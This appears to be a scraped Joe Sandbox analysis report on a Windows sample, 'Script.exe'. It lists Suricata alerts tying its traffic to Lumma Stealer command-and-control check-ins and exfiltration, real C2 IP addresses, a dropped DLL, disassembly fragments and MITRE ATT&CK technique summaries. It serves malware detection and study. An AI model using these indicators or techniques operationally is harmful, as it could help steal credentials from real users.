Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: (@$ (@$P(@$`(@
API String ID: 0-2734072629
Opcode ID: 6c4d8916def746100d32b1070d1f80695f1ae45d3da4813f23de2e76d637deaa
Instruction ID: 6067270fed8268318751b53f2f2ea510f841618e48f8b451a62f54709c15865a
Opcode Fuzzy Hash: 6c4d8916def746100d32b1070d1f80695f1ae45d3da4813f23de2e76d637deaa
Instruction Fuzzy Hash: C2313A71A00B448FD734DF1AC588B13B7E4BB44314F548A2DD5964BAA1D7BAF988CF81

Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	0_2_009DA6B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax+30h]	0_2_009E26B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_009E26B0
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1CE638E1h	0_2_00A02E50
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+08h]	0_2_009CB660
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	0_2_009E3060
Source: C:\Users\user\Desktop\Script.exe	Code function: 4x nop then push eax	0_2_009CD990

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49717 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49732 -> 104.21.33.116:443

Source: Joe Sandbox View	IP Address: 104.21.33.116 104.21.33.116
Source: Joe Sandbox View	IP Address: 147.45.47.81 147.45.47.81

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49732 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 104.21.33.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.33.116:443

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.81
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Script.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Script.exe_501b84e33378948dc4e29bf5ce7dbb49857e225_f9569dfc_59b733d4-3678-41e0-85f8-83fbaec77459\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA0F2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1FC.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA22C.tmp.xml

C:\Users\user\AppData\Roaming\gdi32.dll

C:\Windows\appcompat\Programs\Amcache.hve

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
Script.exe

Function 6E0C1148 Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6E0C11F8 Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6E0C1041 Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Function 6E0C5E6D Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Function 6E0C66D0 Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 6E0C4436 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 009E26B0 Relevance: 17.1, Strings: 13, Instructions: 836
COMMON

Function 009CB660 Relevance: 16.7, Strings: 13, Instructions: 404
COMMON

Function 009EF2B0 Relevance: 11.5, Strings: 9, Instructions: 250
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre